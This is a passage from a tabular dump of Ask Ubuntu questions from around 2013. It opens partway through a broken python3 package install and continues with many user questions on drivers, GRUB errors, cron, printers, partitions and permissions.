python3_3.3.1-0ubuntu1_i386.deb ) ... running python pre-rtupdate hooks for python3.3 ... unpacking replacement python3 ... dpkg : dependency problems prevent configuration of python3 : python3 depends on python3.3 ( > = 3.3.1-1~ ) ; however : package python3.3 is not configured yet . python3 depends on python3-minimal ( = 3.3.1-0ubuntu1 ) ; however : package python3-minimal is not configured yet . dpkg : error processing python3 ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... errors were encountered while processing : python3 i also tried to remove and reinstall python3 any help please ? edited after gx1sptdtda 's answer sudo apt-get clean sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 4 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up python3.3-minimal ( 3.3.1-1ubuntu5 ) ... traceback ( most recent call last ) : file `` /usr/lib/python3.3/py_compile.py '' , line 8 , in < module > import imp file `` /usr/lib/python3.3/imp.py '' , line 28 , in < module > import tokenize file `` /usr/lib/python3.3/tokenize.py '' , line 28 , in < module > import re file `` /usr/lib/python3.3/re.py '' , line 122 , in < module > import sre_compile file `` /usr/lib/python3.3/sre_compile.py '' , line 14 , in < module > import sre_parse file `` /usr/lib/python3.3/sre_parse.py '' , line 17 , in < module > from sre_constants import * file `` /usr/lib/python3.3/sre_constants.py '' , line 18 , in < module > from _sre import maxrepeat importerror : can not import name maxrepeat dpkg : error processing python3.3-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of python3-minimal : python3-minimal depends on python3.3-minimal ( > = 3.3.1-1~ ) ; however : package python3.3-minimal is not configured yet . dpkg : error processing python3-minimal ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3.3 : python3.3 depends on python3.3-minimal ( = 3.3.1-1ubuntu5 ) ; however : package python3.3-minimal is not configured yet . dpkg : error processing python3.3 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3 : python3 depends on python3.3 ( > = 3.3.1-1~ ) ; however : package python3.3 is not configured yet . python3 depends on python3-minimal ( = 3.3.1-0ubuntu1 ) ; however : package python3-minimal is not configured yet . dpkg : error processing python3 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : python3.3-minimal python3-minimal python3.3 python3 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit : installation of all the dependencies for python3.3-minimal sudo apt-get install libc6 libexpat1 libpython3.3-minimal zlib1g returns reading package lists ... done building dependency tree reading state information ... done libc6 is already the newest version . libexpat1 is already the newest version . libpython3.3-minimal is already the newest version . libpython3.3-minimal set to manually installed . zlib1g is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 4 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up python3.3-minimal ( 3.3.1-1ubuntu5 ) ... traceback ( most recent call last ) : file `` /usr/lib/python3.3/py_compile.py '' , line 8 , in < module > import imp file `` /usr/lib/python3.3/imp.py '' , line 28 , in < module > import tokenize file `` /usr/lib/python3.3/tokenize.py '' , line 28 , in < module > import re file `` /usr/lib/python3.3/re.py '' , line 122 , in < module > import sre_compile file `` /usr/lib/python3.3/sre_compile.py '' , line 14 , in < module > import sre_parse file `` /usr/lib/python3.3/sre_parse.py '' , line 17 , in < module > from sre_constants import * file `` /usr/lib/python3.3/sre_constants.py '' , line 18 , in < module > from _sre import maxrepeat importerror : can not import name maxrepeat dpkg : error processing python3.3-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of python3-minimal : python3-minimal depends on python3.3-minimal ( > = 3.3.1-1~ ) ; however : package python3.3-minimal is not configured yet . dpkg : error processing python3-minimal ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3.3 : python3.3 depends on python3.3-minimal ( = 3.3.1-1ubuntu5 ) ; however : package python3.3-minimal is not configured yet . dpkg : error processing python3.3 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python3 : python3 depends on python3.3 ( > = 3.3.1-1~ ) ; however : package python3.3 is not configured yet . python3 depends on python3-minimal ( = 3.3.1-0ubuntu1 ) ; however : package python3-minimal is not configured yet . dpkg : error processing python3 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : python3.3-minimal python3-minimal python3.3 python3 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit : sudo dbkg-reconfigure -a 1/ asks : ─────────────────────────────┤ adduser ├────────────────────────────────┐ │ │ │ by default , users ' home directories are readable by all users on the │ │ system . if you want to increase security and privacy , you might want │ │ home directories to be readable only for their owners . but if in doubt , │ │ leave this option enabled . │ │ │ │ this will only affect home directories of users added from now on with │ │ the adduser command . │ │ │ │ do you want system-wide readable home directories ? said yes 2/ ┤ configuring apparmor ├──────────────────────────┐ │ please enter a space separated list of any additional locations for user │ │ home directories . these locations are in addition to those specified in │ │ /etc/apparmor.d/tunables/home and must end with a '/ ' . │ │ │ │ example : if user 's directories are stored in /srv/nfs/home and │ │ /mnt/homes , you should enter `` /srv/nfs/home/ /mnt/homes/ '' . │ │ │ │ additional home directory locations : i do n't know what location to indicate ... so i just pass finally , i read on the shell : update-rc.d : warning : /etc/init.d/acpi-support missing lsb information update-rc.d : see < http : //wiki.debian.org/lsbinitscripts > acpid stop/waiting acpid start/running , process 24816 * starting apparmor profiles skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd [ ok ] * reloading apparmor profiles skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd [ ok ] gpg : key 437d05b5 : `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' not changed gpg : key fbb75451 : `` ubuntu cd image automatic signing key < cdimage @ ubuntu.com > '' not changed gpg : key c0b21f32 : `` ubuntu archive automatic signing key ( 2012 ) < ftpmaster @ ubuntu.com > '' not changed gpg : key efe21092 : `` ubuntu cd image automatic signing key ( 2012 ) < cdimage @ ubuntu.com > '' not changed gpg : total number processed : 4 gpg : unchanged : 4 unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' /usr/sbin/dpkg-reconfigure : asymptote is broken or not fully installed edit : synaptic on synaptic , no `` broken dependencies '' is displayed ( i click on status and all i can see is : all installed installed ( local or obsolete ) installed ( manual ) not installed not installed ( residual config )
316191	evince 3.4.0 can not display some simplified chinese fonts	i have installed acroread-fonts and xpdf , but still failed to display those fonts . i also tried to use acroread , failed too . i use evince 3.4 in ubuntu12.04.2 amd64 arch . how to do with it ? thanks below is screenshot .
316192	atheros drivers support for wifi direct	my laptop has a wireless pci ( atheros ar242x / ar252x ) that does n't seem to support 802.11n . by default it uses the ath5k kernel drivers.from 'iw list ' command i can see that it does n't support p2p-go/client interfaces.i know that ath9k drivers support p2p-go/client interfaces , but ath9k is compatible with 802.11n devices only . my question is : do i require a 802.11n supported wireless card in order to use wifi-direct ? if it is no , then how do i get my wireless card ( atheros ar242x / ar252x ) to support wifi-direct ? or is there a way where i can make it use ath9k ( which support wifi-direct ) instead of ath5k ? i use ubuntu 12.04
316193	how do i install opera for linux in ubuntu ?	i have downloaded opera for linux 64-bit version , but when i try to install via ubuntu software center it tells me it is the wrong architecture . what can i do ?
316196	how should i configure jenkins for ruby on rails ?	i am using ubuntu 12.04 and i have installed jenkins on my system . what additional software and plugins do i need for running ruby on rails jobs , and how should i configure them ?
316197	password protect files/folders using cli	i have some important documents that i need to protect from anyone else having access to my machine . the problem being the other persons have access to my machine via root account so changing the file permissions is not a option for me . i have seen apps like cryptkeeper but i was wondering can i password protect my files/folder by command line mode in ubuntu .
316200	how do i convert windows 7 files to work in ubuntu	i have a number of cd 's with some of my windows 7 files , i.e musical compositions/pictures and other data . is there a way to convert them to be used with ubuntu ?
316203	how to manage premission for user group for internal harddisk partitions	someone suggest me that for managing permission for accessing the partitions of hard disk you should add users to group and now i have found from askubuntu.com that how to add user to groups . but i not get the way how to add permissions for users in such a way that they not have access to specific hard disk partition but they have access to other partition without use of admin password ? after mounting partition in admin user when i go to properties and then to permission and their try to change the premissions something like access to files/folder and groups then when i change the groups and going to save it automatically changed to previous setting before i can save ? i am using ubuntu 12.04 lts so please tell how to manage the permission for user for access to hard disk partitions ?
316214	sony vaio svf1521c5e sound problem with ubuntu 12.04	i have a problem on my sony vaio fit 15 e ( svf1521c5e ) running ubuntu 12.04.02 x64 . in particular i ca n't hear any sound from my speakers . i have no problem to listen with the headphones . my hardware is the following : $ lspci -nn|egrep 'ultimedia|udio|sound|ac97|ac97|emu' 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) $ aplay -l **** lista di playback dispositivi hardware **** scheda 0 : pch [ hda intel pch ] , dispositivo 0 : hda generic [ hda generic ] sottoperiferiche : 1/1 sottoperiferica # 0 : subdevice # 0 scheda 0 : pch [ hda intel pch ] , dispositivo 3 : hdmi 0 [ hdmi 0 ] sottoperiferiche : 1/1 sottoperiferica # 0 : subdevice # 0 $ cat /proc/asound/car*/co* | grep codec codec : realtek id 233 codec : intel pantherpoint hdmi
316221	resolution hd 1920x1280 with intel graphics in ubuntu 12.04 lts	i use a pentium iv pc [ hewlett-packard hp d530 cmt ( dc577av ) ] containing the 'intel corporation 82865g integrated graphics controller ' with an hd tv set as a monitor . i have to use the integrated graphics because i was not able to install ubuntu with an external graphics card and found no linux driver for the external card . therefore i have to use a vga connection . under windows xp the resolution 1920x1080 , 60 hz , works precisely this way . 'ubuntu 12.04.2 lts ' enables precisely the same resolution and frequency with a monitor that it recognizes , even using vga connection . but the ubuntu does not recognize my tv set and , with the tvset , it does not offer the 1920x1080 resolution . according to intel driver can not detect my monitor and get native resolution and http : //www.garrypassarella.co.uk/2011/04/23/add-undetected-resolutions-in-ubuntu/ i have got the resolution 1920x1080 , 60 hz for a moment using terminal $ xrandr screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 2048 x 2048 vga1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 $ cvt 1920 1080 60 1920x1080 59.96 hz ( cvt ) hsync : 79.57 khz ; pclk : 206.25 mhz modeline `` 1920x1080_60.00 '' 206.25 1920 2056 2256 2592 1080 1283 1293 1327 -hsync +vsync $ xrandr -newmode `` 1920x1080_60.00 '' 206.25 1920 2056 2256 2592 1080 1283 1293 1327 -hsync +vsync and $ xrandr -- addmode vga1 `` 1920x1080_60.00 '' . i need to continue adding the resolution into the ubuntu displays menu because , in a new run , the ubuntu 'system settings ' ... 'displays ' offers only the former '1024x768 ( 4:3 ) ' and '800x600 ( 4:3 ) ' resolutions . according to the http : //www.garrypassarella.co.uk/2011/04/23/add-undetected-resolutions-in-ubuntu/ : i see no /etc/x11/xorg.conf file in that directory . i have tried gsudo service gdm stop with a result gdm : unrecognized service . i have tried xorg -configure with a result fatal server error : server is already active for display 0 i am new with ubuntu . please advise me , how to add the new resolution into the ubuntu displays menu , thanks , tomas peceny .
316224	why does cpu usage remain at 100 % after running mathematica 9 ?	i have installed ubuntu 13.04 and mathematica 9 on a sony vaio vpcea36fg . when i run a program in mathematica , cpu usage rises to 100 % . this is a normal . but when mathematica finishes computation , cpu usage remains at 100 % for up to 15 minutes . can anyone explain why ?
316230	wine fails to start foxit reader	when i tried to install foxit reader through wine , i got the following error pop-up window . can anybody helps to debug this error ? the program foxit reader.exe has encountered a serious problem and needs to close . we are sorry for the inconvenience . this can be caused by a problem in the program or a deficiency in wine . you may want to check the application database for the tips about running this application .
316240	how to prevent standard users from accessing other file directory in ubuntu -12-04 desktop ?	i need to prevent/restrict standard users from accessing directory like bin , boot , dev , etc , lib , media ?
316242	how to search a file in multiple jars	want to search a file inside a set of jar files . how this can be done in ubuntu termianl ?
316250	dropbox sys-tray functions broken	some of the functions in the dropbox menu seem to be broken . i can open the dropbox folder , view recently changed files , access the preferences and quit . 'launch dropbox website ' , 'get more space ' and 'help center ' are n't working . i can appreciate the fact that those functions require the default browser ( firefox in this case ) to open , but nothing happens . any ideas ? re-install of dropbox from dropbox website did n't help . i 'm running ubuntu 13.04 32-bit .
316251	windows 7 not starting after installing ubuntu 13.04	i have installed ubuntu 13.04. grub menu is showing both the options windows 7 and ubuntu also.but when i click on windows 7 its just showing black screen and cursor blinking for long time but windows 7 does not start while ubuntu is working fine please help me ...
316256	standards accounts are able to get root access using sudo without password request	i have installed a particular software using the installer present using the command sudo ./install.sh . after the installation now all the accounts on my ubuntu laptop can gain root access by simply issuing command sudo -s , even the standard ( non administrator ) account . also there is no password prompt when issuing command sudo -s. defaults env_reset defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d all all= ( all ) nopasswd : all
316257	everpad 'sync in progress ' freeze and lens crash ?	i like everpad , its better than evernote for windows dektop but a problem is there . the 'sync in progress ' freezes and does n't add new notes to local system . also , everpad lens crashes sometimes .
316258	access to the site without a port	my nginx listen on port 33333 listen 33333 ; in /etc/nginx/sites-available/ i have : server { listen 33333 ; server_name domain.com www.domain.com ; my website work only if i run : www.mydomain.com:33333 how to make it work well with the : www.domain.com without giving the port . note : my port 80 is used by apache . i can not change it .
316259	are there any alternatives to krunner for kubuntu ?	the one feature/program i really admired in osx was alfred : a smart application/file launcher . alfred returned incredibly relevant results after only typing a single character - for example , 'c ' always matched chrome as it was the most used application on my system beginning with 'c ' . unfortunately kubuntu 's equivalent , krunner , requires at least 3 characters to match , does not perform fuzzy logic ( so is not forgiving with typos ) , and i get the impression it does n't order by most-used . it also seems to favor emails , open windows and files over applications ... i may not be entirely accurate on the latter two , but suffice to say the top suggestion in krunner is infrequently what i expect . does anyone know of any alternatives ? overall i am finding kubuntu far more productive than osx ... i just wish it had alfred : p
316260	after installing ubuntu 13.04 cd-rom not working	i remove my windows 7 and install ubuntu 13.04 amd64 in efi after many hit and trail . first time i install ubuntu with dvd and it is success full installation but i decide to install in efi . in second install i found my cd drive not working ( i try ubuntu and w7 cd but not boot ) then i use live pen drive and successfully install in efi . but still cd drive not work . i know it is function and i burn 3 dvd before trying ubuntu and from ubuntu i can eject it and also found in disks utility . but still it not read any cd/dvd and i also try all the questions available here . output from lshw *-scsi:1 physical id : 3 logical name : scsi1 capabilities : emulated *-cdrom description : dvd-ram writer product : dvd a ds8a5lh vendor : hp physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 1h68 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc now what to do please help ... ( i am on hp probook 4530s . and it is not possible for me to get a usb cd drive or replace it )
316262	can i allow a standard user to execute only certain sets of command in terminal ?	can i create a whitelist of commands that a standard user can execute in the terminal in ubuntu 12.04 desktop ? i do n't want to block the terminal for the standard user .
316264	how to craft a crontable entry that keeps mongodb running in the event of a crash ?	i need help crafting a crontable entry that will make sure the mongodb service ( daemon ) is running on a particular port and if it is not , start it . i want to set this up so that if mongodb crashes , it is automatically restarted . i 'd like to have the check occur every five minutes . i have done this for other server processes but those services automatically exit if they find the port they want to bind to is already in use . my concern as a mongodb newbie is that i 'll end up starting yet another instance of mongodb every five minutes instead of making sure only one instance is loaded . for example , here is my crontable entry for a chatbot service i keep running : 0,5,10,15,20,25,30,35,40,45,50,55 * * * * cd /home/ [ username ] /chatscript ; ./linuxchatscript32 2 > /home/ [ username ] /cronserver.log how can i create something similar for mongodb ?
316265	docky lubuntu autohide issue	i installed lunbutu 13.04 with docky and when i open windows the dock is not hiding . i tried to enable auto hiding in dock setting but will not let me change the setting , also i ca n't change to 3d dock.every time i enter docky it say that composititng is not enabled . any way to enable compositing or at least fix autohide thx
316268	help needed to install nvidia driver on ubuntu 13.04 64 bit	im a newbie here , i was trying to install nvidia driver on ubuntu 13.04 64 bit , i have an asus laptop with nvidia geforce gt645m , im trying to follow the steps on http : //paste.ubuntu.com/5601226/ but when i almost reach the final steps , i ca n't download some of the files , it gives me '404 not found ' msg . the files are the bottom part which after 'cd xstuff ' , line 81 onwards . ( sorry i ca n't post more links here due to my reputation is still low ) now i 'm in the have way this , any helps on this ? thanks in advance
316270	cron job is n't working	i have an sh file called m.sh with the contents : echo `` cleaning memory '' sync ; echo 3 > /proc/sys/vm/drop_caches echo `` '' free -m echo `` '' ps cax | grep java > /dev/null if [ $ ? -eq 0 ] ; then echo `` == server is already running == '' else sh a.sh echo `` ========== starting the server ========== '' fi when i run it with sh m.sh it works perfectly . but i need it to run every 5 minutes , so i am using cron jobs . it needs to work as root/sudo so i did sudo -s , then crontab -e and wrote this in the file : 0,4,9,14,19,24,29,34,39,44,49,54 * * * * /bin/sh /home/ < username > /m.sh i had done some research , and i learned that the cron has different paths than the user , that is why i used those absolute paths , to make sure . the cron job was n't running the script every 5 minutes , as it was supposed to . i also added * * * * * /bin/echo `` testing123 '' to test if cron was working at all , and nothing came up in the console . how can i make the cron run the script every 5 minutes ? i did research online , and tried the solutions , but could n't make it to work for me . i did service cron start and it said it was already running . i also restarted the service . the permissions are set correctly , i gave all users read , write , and execute permissions just to make sure ( i know the permissions are correct ) .
316275	installing ubuntu on usb and booting on uefi	i have a new laptop with windows 8 preinstalled . i want to install ubuntu on a usb stick . then i want to boot form the usb and use ubuntu when i need . when i do n't need ubuntu i just want to boot win 8 from the hd . i do n't want to partition my windows drive . is this possible ? how can i do this ?
316278	error while upgrading to ubuntu 13.04	when i tried to upgrade my ubuntu 12.10 : the operation failed e : gpg error : http : //az-1.hpcloud.mirror.websitedevops.com quantal release : the following signatures were invalid : nodata 1 nodata 2 what 's the solution ? i need this upgrade .
316280	zenity progress bar and output	i wrote this little script : response= $ ( process ... ) | zenity -- progress -- pulsate echo $ response i want read the response of the process , whatever it is , and show a pulsating progress bar in the meanwhile . the problem is that i do n't read any response at the end . i think because all the output from the pprevious process is sent to zenity .
316282	canon pixma mx350 connection problem	i 'm trying to make my canon pixma mx350 network printer work with lubuntu 13.04 with gnome shell 3.8 ( already went through the other questions for this model ) . cups ( or the gnome printer manager ) ca n't find it on the network just by scanning . i managed to add the printer to cups though by specifying the mac address manually . still it does n't respond to print jobs . cups says ( or the printer is saying to cups ? ) : '' can not specify model number . '' i 've used the 32 bit driver on my 64 bit lubuntu in the past , a much older driver though downloaded from canon . sometimes it worked , sometimes it did n't . so due to recent total refusal of the printer to respond , i removed it from the system and now i 'm trying to reinstall it with a newer driver , from this ppa . still 32 bit though as that repo does n't have the 64bit flavour either . this printer does accept print jobs though from ubuntu and windows on another machine on the same network . ubuntu has it installed with the older driver . here is a longer error log from cups : http : //pastie.org/8101197 . now i went back to the old driver because it works on ubuntu on the other pc . i also switched the printer connection from wlan to wired lan to exclude wireless flakiness . the cups error message then turns into : '' can not load library ''
316290	can i install two xampp in my ubuntu 12.04	i am a web developer . i am install two xampp version 1.8.1 in my ubuntu 12.04 . i have install one xampp in /opt folder and another in other ntfs partition . please tell me how i install them .
316292	uninstalling apps from the dash	is it possible to uninstall an application ( with it relative packages ) from the dashboard without opening the software center , searching for it and hitting `` remove '' ?
316295	are files on ubuntu one secure ?	are my files stored in ubuntu one secure from the american intelligence agency ( nsa ) ? in which country are they stored ? is it better than using dropbox or any other popular cloud ? thanks in advance for your answers !
316296	openvpn missing in `` connection type dialogue '' in ubuntu 13.04	i need to connect to my work computer with an openvpn connection , this is something that i have successfully set up on my ubuntu 12.04 in the past , so i 'm alright with with how to do this in theory . i was using the `` network dialogue '' thing , selected `` add connection '' , then `` open vpn '' and filled in the location of the config files , so no problem here . with the new ubuntu 13.04 , this option has now disappeared and it only offers me `` saved vpn '' or `` pptp '' , neither of which would work or accept my config files . i tried to follow the instructions on the net on using the terminal and installed the odd program , but ca n't get it to work . is there any way that i could make the aforementioned network manager dialogue to accept my open ( ! ) vpn again ?
316299	can not access ubuntu 13.04 virtualbox guest in full screen mode after sleep	i am running ubuntu 13.04 as a guest in virtualbox 4.2.14 , on a windows 8 host . when the ubuntu goes to sleep while in full screen mode , i can not wake it up . the screen does not respond to input at all . i first have to `` host + f '' to get it into normal more before i can type in the password to enter . this is really annoying . has anyone else experienced this and know how to resolve it ? it happens in both 32 and 64 bit versions
316302	how to access my partitions ?	i just made a fresh install of ubuntu 12.04 lts , and i was n't sure how to go about all partitioning , and mount points . the installer wanted each to be mounted in a different place , and so i did it . now when i open the file system , in / i see 99 gb of free space , but when i change to /home/chris/ directory , there is only 31.7 gb free . how can i access the remaining over 45 gb that there should be ? i tried cd /dev/sda5 , but it warns me that such directory does not exist . below is a screenshot of gparted output . if i entirely made it wrong , please let me know what partitioning should i have done , i can always reinstall again . all your help is really appreciated . thank you , chris !
316305	assign users to /home folders after fresh install	to the point : after a fresh install , i can not figure out how to assign users to existing folders on the /home partition . the details : i upgraded from 10.04 to 12.04 . i have 3 partitions : / , swap , and /home . i formatted / and swap , while assigning /home while not formatting . the old folders and files are clearly there . the command ls -l /home in a terminal shows : total 40 drwxr-xr-x 25 andy andy 4096 jul 4 08:46 andy drwxr-xr-x 21 andy andy 4096 jun 5 18:52 andyl1 drwxr-xr-x 26 base base 4096 jul 4 08:52 base drwxr-xr-x 29 base base 4096 jun 5 19:01 basel1 drwxr-xr-x 27 denise denise 4096 jul 4 08:45 denise drwxr-xr-x 18 denise denise 4096 jun 5 18:56 denisel1 drwx -- -- -- 2 root root 16384 feb 16 2012 lost+found the users andyl1 , denisel1 and basel1 are all from the old install ( 10.04 ) . i would greatly appreciate any advice on how to assign the old folders . i 'm not sure if the best/cleanest way is to assign the old folders to the new users , or delete the new users and try to mimic the older naming convention . additionally , i can follow general directions when given gui guidance , how ever , i would appreciate very detailed instructions if i need to drop to a terminal . thank you
316310	how to stop steam from installing itself to other users ?	i installed steam and i want it to be installed only on my account . everytime when someone else logs in , steam tries to update itself to complete the installation for that user . i do n't want to do that for every user becouse the update is really big and i have limited hdd space , so is it possible to stop steam doing that ?
316315	create partition from free space - can not create more than 4 partitions	i am dual-booting ubuntu and win 8 . when i installed ubuntu , i forgot to format a partition of 90gb . now when i tried to create a partition ( in gparted ) , i get this error it is not possible to create more than 4 primary partitions if you want more partitions you should first create an extended partition . such a partition can contain other partitions . because an extended partition is also a primary partition it might be necessary to remove a primary partition first . here 's a screen shot : sda1 is that small space that windows loves to create for reasons unclear to me sda2 and sda4 are windows 8 drives c : and e : sda3 is my linux drive the last unallocated 10.2mb ? i have no idea where that came from . but why is ubuntu counting window 's drives as primary ? but more importantly , how can i get that 90gb back , win8 disk management also gives some error : (
316316	update manager error-failed to download repository information	when i run update manager , ii get following error . i am using ubuntu 12.04 lts , 64 bit . i am new to ubuntu please help me out .
316331	where to set account tracking in cups printing	we have a sharp department printer mx 2640 . i downloaded the required ppd from the sharp site and installed it using the cups gui on localhost:631 the department requires us to identify by `` user identification '' ( actually in german it reads benutzernummer , which would be literally `` user number '' ) . this is an account number , as more but one department print to this printer . edit : the feature i am looking for is acutally `` account tracking '' . the windows gui has an option to set this feature , but how to set it using cups ? without that number , jobs get silently ignored . ( printer seems to accept job but ignores it )
316341	how to load windows 7 from grub rescue	i had windows 7 and ubuntu installed on the same partition some time later , decided to uninstall ubuntu.so i booted ubuntu , changed the hd related to it to ntfs , i did not extended my main drive restarted- > grub rescue > . no surprise since i had just wiped out the whole grub directory staff now i just want to boot into my windows.move my necessary files to an external memory and reinstall the windows seven what i have in my hands : ubuntu live cd , a copy of win7 dvd i tried to make use of the win7 dvd ( i had lost my dvd ) to fix the mbr but the problem is when i choose repair , it says that this version of windows is incompatible with yours what should i do ?
316343	error : no such partition grub rescue > after deleting partition	for reasons that are not relevant i had two partitions of ubuntu studio on my computer , one 28gb and the other ~900gb . i was using only the 900gb partition but sometimes i would accidentally boot to the 28gb partition so i decided to remove it . i used the ubuntu studio live usb with gparted to delete the 28gb partition . i also added a label to the 900gb partition for future reference . i restarted my computer and it now says error : no such partition grub rescue >
316344	how to specify wi-fi access point order ?	is there a way to specify the order which ubuntu tries aps i notice after moving around a bit i have a lot of extra ap 's some which i use more than others i 'd like to push some to the top of the list instead of waiting for a weak hot-spot to fail first .
316345	ethernet does not connect when wifi is enabled	ever since upgrading to 13.04 i have been experiencing a rather weird phenomenon . at the office , we primarily use ethernet , but there is also a wifi network in the building ( lets call it wifix ) . if i want to use the ethernet rather than wifix i must make sure my laptop has booted with wireless disabled ; if wireless is enabled it will connect to wifix during bootup , and the ethernet will somehow not work . even if i then disable wireless after booting . so to get ethernet to work , i must disable wireless , and reboot my machine . this means i must remember to disable wireless each time i shut down my laptop . or else i must reboot just to get the freaking ethernet to work . there must be a way to fix this , but how ?
316349	how can i delete ubuntu and install windows xp ( .exe version )	what my problem is , is that i want to install windows xp on my laptop where ubuntu is installed on , i can not run the disc because it is an .exe and you ca n't run that on ubuntu . i tried several things and searched for like an hour on the internet , i hope someone knows how to help me . sorry for my bad english , i am dutch . [ edit ] the answer wich some of you linked is not an answer to my question because i have a black screen after i try to boot with the disc
316352	grub rescue error	i have windows 8. i removed uefi settings ( if i on uefi i can not install ubuntu ) and installed ubuntu ( now if i want to use windows 8 i should on uefi ) .now by turning on uefi , went to window8 , removed ubuntu and i tried to install ubuntu once again by turning down uefi , then i got the error error : no such partition grub rescue.i turned on uefi and i am able to log in to windows with no errors but if i turn off uefi and try to install i am getting that error . i dont have win8 cd can i get rid of this error by installing some other linux distro say fedora ?
316354	how to sent an installation error report that occurred while not having an internet connection ?	i wanted to contribute to lubuntu by testing their daily dev build . i tried installing it but got an error . not a problem , that 's the point of testing ! ; ) but since the error comes before having a wi-fi connection , it ca n't sent the report . however , it then goes back to live mode and from there i can connect to wi-fi . now how can i have it send the error report ? or get the logs so i can manually file the bug on launchpad ?
316357	how to use ubuntu qml dialog or other popup without any buttons ?	i am trying to make a modal popup where all there is is a progress bar , and when the progress bar is full it automatically closes , dialog and the other popups do n't seem to even show unless you set them up with buttons ( not including popover , that 's too far off from what i want ) , is there a way i could get dialog or defaultsheet to work without any buttons ? or else how can i make my own popup with popupbase ? that 's what i 'm prepared to do now , just not sure how , i know i would need to create a file mypopup.qml ( which then i could do mypopup { stuff goes here } but in mypopup.qml would i do popupbase { mypopup contents go here } ? ? ? would n't that be using it directly ( api page says not to use it directly ) , and if so , how do you `` inherit '' popupbase to create your own popup ? if my question is confusing please let me know and i 'll try to clarify .
316361	why does wineprefixcreate create an empty directory ?	i used this short guide to attempt making a separate wine prefix in my home folder : how to use wineprefix in ubuntu to optimize gaming seems pretty simple but is n't working for me . the mkdir works and puts a new folder in my /home folder . but when i use that folder name in wineprefixcreate it does n't show up with the c : drive and such in that folder like my .wine/ folder . is there a codec or something that i 'm missing ? could i just copy and paste the files from .wine into that new folder ? i 'm trying my hardest not to give up on ubuntu but i 've had this almost 2 weeks now and have n't been able to get a single game to work yet . would really like to play neverwinter mmo , kotor , lol , etc . please help and thank you . i have wine 1.4 and ubuntu 12.04 64 bit .
316364	why does 13.04 cause my laptop screen to go completely black ?	i have been using ubuntu for several years , but this is the first time i have had a problem like this . when i upgraded from 12.10 to 13.04 , every time i boot into ubuntu and the login screen is supposed to show up , my screen remains black . i ca n't see any part of the login screen . typing on the keyboard and moving the mouse does n't help at all . the same happens when i lock my screen and walk away . when i come back , no keyboard or mouse movement bring the display back up . the only way i have overcome this is by using my keyboard 's `` brighten the screen '' button . only then does the screen the login or lock menu . i was hoping that at some point , an update would fix the problem . but as of now , it has stayed the same , and i have been putting up with it for nearly three months . why does 13.04 cause my laptop screen to go black ? is there a way to fix it ? the laptop in question is a hp pavilion dv4-2160us entertainment notebook
316365	no games work at all	so far i have tried downloading steam and even tux racer , and nothing will run . it seems like it 's a driver issue . i ran lspci -v in the terminal , and this is what popped up for my graphics card : 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs880m [ mobility radeon hd 4100 ] ( prog-if 00 [ vga controller ] ) subsystem : toshiba america info systems device ff80 flags : bus master , fast devsel , latency 0 , irq 18 memory at d0000000 ( 32-bit , prefetchable ) [ size=256m ] i/o ports at 9000 [ size=256 ] memory at cfdf0000 ( 32-bit , non-prefetchable ) [ size=64k ] memory at cfe00000 ( 32-bit , non-prefetchable ) [ size=1m ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : radeon
316374	i have xp on one partition and windows 7 on another . how do i install ubuntu on a seperate partition ?	i have a 500 gb hdd . there are 6 partitions . windows xp is installed on partition c. windows 7 is installed on partition d. i want to install ubuntu 12.04 on partition e. please tell me how to do that -- -- step by step .
316375	personal organizer software for ubuntu ?	i 'm looking for suggestions for software that reminds me of the birthdays and anniversary of friends , like ms outlook . i also need to be able to import contact details from outlook to ubuntu .
